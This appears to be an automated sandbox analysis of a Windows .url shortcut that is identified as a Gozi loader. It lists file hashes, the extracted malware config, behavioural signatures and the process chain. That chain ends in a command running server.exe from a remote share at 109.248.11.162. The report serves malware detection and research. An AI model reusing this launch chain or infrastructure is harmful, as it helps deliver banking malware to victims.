Analysis

max time kernel: 146s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-03-2023 08:15
Static task: static1
Behavioral task: behavioral1
Sample: Agenzia/Agenzia.txt.url
Resource: win7-20230220-en
General

Target: Agenzia/Agenzia.txt.url
Size: 195B
MD5: cc689d7d4fa6905ebc5958630848fa00
SHA1: 3d0ca3eeb7a45d2367b0693188ba99cf68f6a520
SHA256: 67f14cb9d372a7a295a96a82f2eab679b7373f3613df6b8dcf9434482047caa1
SHA512: 974c9c969029636eb6db168cc65ddaed096b2695815107f8f0c14da0ab419c7ac25c76a8f16eeaad03102efcd918991f11e7a9685a1fb94a851280349862efdd
Malware Config

Extracted: gozi
7713
base_path: /drew/
build: 250255
exe_type: loader
extension: .jlk
server_id: 50
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes: rundll32.exe
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
  process: rundll32.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: rundll32.exe
  description: PID 1392 wrote to memory of 1884; pid: 1392; process: rundll32.exe; target process: server.exe
  description: PID 1392 wrote to memory of 1884; pid: 1392; process: rundll32.exe; target process: server.exe
  description: PID 1392 wrote to memory of 1884; pid: 1392; process: rundll32.exe; target process: server.exe
Processes

1. C:\Windows\System32\rundll32.exe
   command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.txt.url
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

2. \??\UNC\109.248.11.162\Agenzia\server.exe
   command line: "\\109.248.11.162\Agenzia\server.exe"